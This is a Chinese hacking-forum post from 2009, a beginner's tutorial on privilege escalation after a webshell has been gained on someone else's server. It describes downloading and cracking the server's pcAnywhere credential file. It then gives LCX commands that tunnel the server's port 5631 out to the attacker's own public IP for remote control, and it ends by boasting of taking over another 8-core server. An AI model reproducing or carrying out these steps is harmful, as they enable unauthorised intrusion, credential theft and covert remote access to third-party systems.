|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
" C6 s. G) C1 M
) o# {, |' w, l! p" E& p提权方法:pcanywhere+LCX! B" A8 T# l& j) r+ J0 v/ \* Q f* Q
7 X5 G# \( h& V获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
! b, J' f" Y& b0 A2 ]4 p8 X( I! Q6 u$ n. `
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
1 j1 s9 S6 t; u7 X
" p! O" F0 @+ Z# O1 {) E) `( C5 k# ^8 N
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
: X+ `0 y0 ?6 R5 Y$ _1 b7 f4 D* r# @; d4 r& d# L: ^6 N9 R
- [: `1 ~5 ]8 m0 [6 F7 E
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
: D' t! q! N% Q, {8 Q+ a- s: I% n% V: `' X" j. }% c7 ^
5 H6 j3 ]" c4 e) f+ p
( D H' B# @) l: k2 x ]
' h; P' m; m& q) V由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``& \9 X% ]4 t; x% Q6 L
+ J A# J) k0 y# G, u; W
$ @3 y1 A5 r) y. oLCX的用法再简单说下:
/ q$ a$ B0 H9 r- J3 ^3 m
! F/ p6 z l, r% i服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)$ [6 W @+ m/ b
t- ?4 [% l& I+ f8 u& ]2 ]* ? `
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)+ ?9 ~0 A! j1 Q; _$ e
' s/ x) N9 ]6 @9 d$ c由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。" R; V* [/ o0 A) O$ U
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``" ?" s, s+ Y3 F0 `2 `
" f4 Z* {. O. u9 p+ B" D7 M# n4 D. K3 T0 [3 `! q. }# W* W+ |
* ]" V; u) X: H9 J' ^; S3 ]! j
& H B% \$ G! s, P% {" J3 U4 N呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
4 ?; S& r: O9 D5 J/ `- V3 Z+ k& F4 \1 o4 y) b
0 U8 H9 ^; w& w1 f+ Z9 Q
* ~$ P. B' i1 ]7 y
6 q0 c9 ~5 l+ u' o* s6 ^ G我们本地连接试试,输入我们刚破解的账号密码
2 {/ f3 a9 f' J }: p
/ U; o8 Q; o! A+ E
- d$ [7 s# J; K0 a, g$ q3 p" W呵呵``连接成功,服务器不错,又一个8核^︵^4 F" W) q/ F3 ^* G4 [
) Y' M# P$ i( C& v8 W
7 D( ]+ s) y$ `# G% E8 `
# e( s. d& ^: ^! z7 f
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
